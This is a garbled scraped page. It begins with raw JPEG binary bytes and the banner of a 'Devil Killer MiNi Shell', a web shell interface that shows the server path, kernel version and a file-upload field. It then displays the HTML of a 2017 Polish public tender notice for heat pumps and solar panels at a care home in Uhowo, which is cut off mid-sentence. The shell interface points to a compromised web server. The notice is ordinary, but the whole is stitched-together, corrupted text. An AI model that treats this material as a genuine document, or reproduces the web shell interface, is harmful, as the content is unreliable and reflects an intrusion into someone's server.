JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170905/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170905/583057-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 583057-N-2017 z dnia 2017-09-05 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Powiat Białostocki- Dom Pomocy Społecznej w Uhowie </span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Modernizacja systemu grzewczego oraz systemu ciepłej wody użytkowej w Domu Pomocy Społecznej w Uhowie</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Regionalny Program Operacyjny Województwa Podlaskiego na lata 2014-2020</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Powiat Białostocki- Dom Pomocy Społecznej w Uhowie </span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">001265350</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Surażska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">67, Uhowo</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">18 - 100</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Łapy</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">podlaskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">85 715 33 97</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">dpsuhowo@pro.onet.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax"></span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://bip.dpsu.st.bialystok.wrotapodlasia.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Jednostki organizacyjne administracji samorządowej</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.dpsu.st.bialystok.wrotapodlasia.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://bip.dpsu.st.bialystok.wrotapodlasia.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">w formie pisemnej, osobiście, pocztą, kurierem</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Dom Pomocy Społecznej w Uhowie, ul. Surażska 67 Uhowo, 18-100 Łapy</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Modernizacja systemu grzewczego oraz systemu ciepłej wody użytkowej w Domu Pomocy Społecznej w Uhowie</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.DPS.II-1/2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest realizacja inwestycji polegająca na modernizacji systemu grzewczego oraz systemu ciepłej wody użytkowej poprzez zastąpienie istniejących źródeł energii nowoczesnymi energooszczędnymi i ekologicznymi źródłami ciepła oraz energii elektrycznej zaopatrujących Dom Pomocy Społecznej w Uhowie. Przedmiotem dostawy, montażu i uruchomienia są:a)	Pompy ciepła typu powietrzne - woda współpracujące z istniejącą instalacją grzewczą o łącznej mocy 90 kW,b)	System fotowoltaiczny DC do ogrzewania wody współpracujący z nowo instalowanymi pompami ciepła o łącznej mocy 4 kW.c)	System fotowoltaiczny AC do współpracujący z systemem energetycznym lokalnego Dystrybutora o łącznej mocy 20 kW.d)	Modernizacja instalacji grzewczej w zakresie zgodnym z Audytem ex antePowyższy zakres wynika z Audytu ex ante i projektów technicznych, STWiOR stanowiących załączniki do wniosku o dofinansowanie realizacji projektu w ramach RPO WP na lata 2014-2020 Poddziałanie 5.3.16.	Dostarczone urządzenia, ich montaż, montaż osprzętu i aparatury oraz dostarczone wyposażenia urządzeń i aparatów muszą zapewniać:-	poszczególne urządzenia, osprzęt, aparatura itd. montowane w obiektach/budynkach muszą być tego samego producenta oraz tego samego typu (tzn. np. pompy ciepła zainstalowane w zakresie niniejszego zamówienia muszą pochodzić od jednego producenta, panele fotowoltaiczne zainstalowane w zakresie niniejszego zamówienia muszą pochodzić od jednego producenta, itd.) Urządzenia wchodzące w skład instalacji powinny być fabrycznie nowe, posiadać gwarancję producentów oraz posiadać instrukcję obsługi i użytkowania w języku polskim,-	wymaganą w niniejszej specyfikacji oraz dokumentacji technicznej/projektowej funkcjonalność - potwierdzoną w instrukcji funkcjonalnej lub karcie katalogowej,-	zgodność z projektami technicznymi stanowiącymi załącznik do wniosku o dofinansowanie - dopuszcza się stosowanie urządzeń, aparatów, osprzętu, innych niż określone w projektach, jednak tylko i wyłącznie takich, które posiadają parametry i funkcjonalności zgodne lub nie gorsze (w tym przypadku udowodnienie leży po stronie Oferenta) z określonymi w odpowiednich w.w. projektach i/lub niniejszej specyfikacji oraz zapewniają pełną realizację wskaźników określonych we wniosku o dofinansowanie, założeń, wytycznych i obliczeń projektowych i/lub określonych w niniejszej specyfikacji w tym zwłaszcza dokumentacji stanowiącej załącznik do wniosku o dofinansowanie - potwierdzonych i uwzględnionych w nowych/poprawionych projektach zgodnie z zasadami określonymi w punkcie A.3.,-	warunki gwarancji zgodne z wymaganiami niniejszej specyfikacji muszą być potwierdzone w momencie składania oferty załączonymi producenckimi kartami gwarancyjnymi (dotyczy do w szczególności: pomp ciepła, paneli PV, inwerterów, regulatorów DC)-	pompy ciepła: należy dostarczyć i zamontować urządzenia w wersji Split (nie dopuszcza się instalacji typu Multi Split lub Monoblok), system dostarczony jako kompletny zestaw urządzeń uwzględniający w szczególności: jednostkę zewnętrzną (skraplacz, sprężarka i automatyka pracy jednostki); jednostkę wewnętrzną (wymiennik płytowy typu freon/woda, sterownik pracy urządzenia, izolacja elementów zestawu, pompa cyrkulacyjna - zasilanie ciepła do zbiornika c.w.u. lub c.o.). Nie dopuszcza się instalacji kliku pomp ciepła o sumarycznej mocy równej lub większej od zaprojektowanej - liczba instalowanych kompletów pomp musi być zgodna z projektem ze względu na ograniczoną przestrzeń montażową oraz zaplanowane wskaźniki realizacji inwestycji określone we wniosku o dofinansowanie,-	system fotowoltaiczny DC: system dostarczony jako kompletny zestaw urządzeń składający się z paneli PV, okablowania, konektorów, systemu montażowego, zabezpieczeń, regulatorów DC, grzałek - zgodnych z projektem technicznym.-	system fotowoltaiczny AC: system dostarczony jako kompletny zestaw urządzeń składający się z paneli PV, okablowania, konektorów, systemu montażowego, zabezpieczeń, inwerterów - zgodnych z projektem technicznym.-	materiały należy dostarczać na miejsce inwestycji wraz ze świadectwami jakości, kartami gwarancyjnymi itp. Dostarczone na miejsce inwestycji materiały należy sprawdzić pod względem kompletności i zgodności z danymi wytwórcy.-	składowanie materiałów powinno odbywać się zgodnie z zaleceniami producentów, w warunkach zapobiegających zniszczeniu, uszkodzeniu lub pogorszeniu się właściwości technicznych na skutek wpływu czynników atmosferycznych lub fizykochemicznych. Składowanie materiałów i urządzeń odbywa się staraniem i na koszt Oferenta.6.	Wymagane parametry, funkcje i wyposażenie pomp ciepła.Wymaga się, aby agregat skraplający i współpracująca z nim jednostka zewnętrzna były systemem jednego producenta. Schematy montażowe i rozmieszczenie urządzeń odpowiednio dla każdego budynku, zgodnie z odpowiednim dla niego projektem.a)	Wymagania ogólne dla wszystkich systemów (układów):o	praca całoroczna,o	prawidłowa praca urządzenia przy temperaturze obliczeniowej dla IV strefy klimatycznej Polski, tj. co najmniej -22oC*),o	agregat wykonany w technologii inwerterowej,o	wymiennik ciepła (lamele) z powłoką hydrofilową,o	autodiagnostyka urządzeń,o	auto restart,o	elektroniczny zawór rozprężny wbudowany w jednostkę,o	prawidłowa praca oddalonych od siebie jednostek zewnętrznej i wewnętrznej ,o	jednostki wewnętrzne winne pracować niezależnie od siebie, zapewniając odpowiednią temperaturę poprzez regulację ilości czynnika chłodniczego - dotyczy instalacji składających się z 2 lub 3 pomp,o	do obsługi jednostki wewnętrznej przyjęto 1 agregat skraplający (jednostka zewnętrzna) montowany jako stojący na wykonanym fundamencie lub konstrukcji, zgodnie z projektem, w miejscu wskazanym przez Zamawiającego (uzgodnienie na roboczo),o	w uzasadnionych przypadkach, uzgodnionych z inwestorem, dopuszcza się wykorzystanie istniejącej kanalizacji deszczowej, zamiast studzienki chłonnej o której jest mowa w odpowiedniej dokumentacji,o	regulacja temperatury musi odbywać się poprzez sterowniki montowane bezpośrednio w jednostce wewnętrznej, oraz ewentualne zdalnie,o	Przekazywanie ciepła z jednostki wewnętrznej do układu c.w.u. jest realizowany przez wężownice wbudowaną w zasobnik c.w.u. ( min. współczynnik przekazania energii 1 kW = 0,3 m2); przy braku dostarczenia zasobnika z odpowiednią wężownicą, należy zastosować odpowiedni wymiennik ciepła - typu płytowy woda-woda z dodatkowym układem pompowym. Przyjęte rozwiązanie, należy uzgodnić i uzyskać zgodę inwestora,Minimalne wymagania dotyczące jednostek wewnętrznych:Jednostka wewnętrzna o mocy grzewczej nominalnej Q >= 45,0 kW/jednostkę(1)	moc grzewcza nominalnie: min. 45,0 kW, / dla A2/W35; COP >= 3,99,(2)	moc grzewcza nominalnie: min. 49,5 kW, / dla A7/W35 COP >= 4,26,(3)	zasilanie: 400V/50Hz,(4)	zakres grzania: od 20 do 60 0C,(5)	poziom ciśnienia akustycznego: <= 28 dB(A),(6)	praca kaskady co najmniej 8 modułów, sterowana z dodatkowego sterownika (oba elementy jednego producenta),(7)	typ wymiennika ciepła: typu płytowy,Minimalne wymagania dotyczące jednostki zewnętrznej.Agregat o mocy chłodniczej nominalnej >= 45,0 kW/jednostkę(8)	jednostka wykonana w technologii inwerter / scroll,(9)	moc grzewcza nominalnie: min. 45,0 kW, / dla A2/W35; COP >= 3,99,(10)	moc grzewcza nominalnie min:. 49,5 kW, / dla A7/W35 COP >= 4,26,(11)	możliwość pracy w funkcji grzania i chłodzenia,(12)	czynnik grzewczy typ: R410A,(13)	zakres poziomu ciśnienia akustycznego: poziom nominalny do 43 dB; poziom maksymalny do 62 dB (14)	wydatek powietrza: min. 14 000 m3/h,(15)	pobór mocy (dla grzania) nie więcej niż 11,32 kW / dla A2/W35,(16)	pobór mocy (dla grzania) nie więcej niż 11,65 kW / dla A7/W35,(17)	jednostka pokryta powłoką hydrofilową,(18)	zasilanie jednostki: 400V/50 Hz,7.	Wymagane parametry, funkcje i wyposażenie systemu fotowoltaicznego DC.a)	Panele PV:(19)	parametry wytrzymałościowe obciążenie statyczne nie mniejsze niż 5400 Pa potwierdzone certyfikatem niezależnej jednostki badającej,(20)	puszka przyłączeniowa o IP67,(21)	moduły wolne od efektu PID,(22)	wymagane jest dostarczenie wraz z panelami listy modułów zawierająca numery seryjne i flashtest każdego modułu mówiący o jego dokładnej mocy oraz parametrach prądowo-napięciowych,(23)	tolerancja mocy wyłącznie dodatnia(24)	moduły muszą być wyprodukowane w 2017 roku.(25)	Certyfikat CEb)	System mocowania:(26)	rodzaj i typ mocowania do dachu: w oparciu o odpowiedni projekt, zgodny z typem i pokryciem dachu na budynku - wymagane jest bezpośrednie uzgodnienie robocze z inwestorem w trakcie wizji lokalnej.c)	Regulator DC:(27)	diagnostyka sprawności wewnętrznych układów krytycznych dla bezpieczeństwa,(28)	diagnostyka sprawności grzałek DC, (29)	dwutorowy pomiar temperatury uwzględniający weryfikację sprawności czujników temperatury,(30)	wielostopniowe włączanie zasilania grzałek z funkcją MPPT (co najmniej 3 stopnie grzałek),(31)	grzanie wody energią DC do temperatury nie wyższej niż programowana w przedziale (65 oC -80oC),(32)	interfejs komunikacyjny RS485 do zdalnej kontroli i sterowania oraz odczytu temperatury wody i ilości pozyskanej energii,(33)	lokalne zobrazowanie temperatury wody, ilości pozyskanej energii od dnia instalacji, dzienny lub okresowy (zerowalny) - wyświetlacz,(34)	możliwość dogrzewania wody energią AC z sieci dystrybucyjnej, gdy brakuje DC z OZE,(35)	możliwość nastawiania preferencji użytkownika przy dogrzewaniu AC (czasowych i temperaturowych),(36)	samodzielna praca w instalacjach DC grzania wody - regulator zasilany tylko z paneli PV - nie wymaga do funkcjonowanie zewnętrznego źródła zasilania,(37)	nadzór temperatury wody, także w nocy, bez zasilania z paneli PV i bez zasilania z sieci AC.(38)	Certyfikat CEd)	Okablowanie:(39)	do połączeń stosować przewody dedykowane do systemów fotowoltaicznych,(40)	wymagana jest zgodność z normami europejskimi (41)	połączenia przewodów wykonywać przy pomocy złączy PV typu MC4.e)	Grzałki:(42)	grzałka nie zintegrowana z regulatorem, zasilana z jednego regulatora DC składa się z co najmniej trzech zestopniowanych grzałek o mocach dostosowanych do reżimu pracy MPPT Regulatora DC (przykładowe zestopniowanie mocy: 260/530/1200W),(43)	napięcie: 60V DC,(44)	środowisko pracy: woda,(45)	materiał: stal nierdzewna, kwasoodporna z kapilarem 8 mm na zamontowanie przetworników temperatury, montowana w tulei o średnicy skorelowanej ze specyfikacją zbiornika buforowego (wg. projektu na pompę ciepła) - wymagana karta katalogowa lub rysunek techniczny potwierdzający parametry techniczne,f)	Uszczegółowienie wymagań dla paneli PV - wymagane wskazanie w kartach katalogowych spełnienia poniższych warunków poprzez ich zaznaczenie na karcie katalogowej:(46)	moc maksymalna (-0W;+5W) Pmax: miń 250 W(47)	sprawność: >=15,3 %,(48)	współczynnik temperaturowy Pmax: nie większy niż -0,42 %/oC(49)	ilość diod bypass: minimum 3 [szt.](50)	tolerancja mocy wyłącznie dodatnia(51)	Zakres temperatur pracy: co najmniej od - 40°C do +85 °Cg)	System monitoringu ilości wytworzonej energii.(52)	- rejestracja ilości wytworzonej energii OZE,(53)	- zdalny monitoring i sterowanie pracą regulatora DC.h)	Inne(54)	Należy stosować zabezpieczenia urządzeń i obwodów zgodnie z istniejącą dokumentacją techniczną znajdującą się w posiadaniu Zamawiającego i z wymaganiami producenta urządzeń oraz odpowiednich norm technicznych i przepisów w zakresie instalacji elektrycznych.(55)	Ilości, rodzaj i średnice przewodów winne wynikać z dokumentacji technicznej urządzeń znajdującej się w posiadaniu Zamawiającego, wymagań producenta i przepisów w zakresie instalacji elektrycznych. Zabrania się stosowania zaniżonych przekrojów żył przewodów lub innych niż określone w projekcie typów okablowania. Przewody elektryczne należy ułożyć w sposób uzgodniony z Zamawiającym i skoordynowany z trwającymi pracami termomodernizacyjnymi w sposób zapewniający 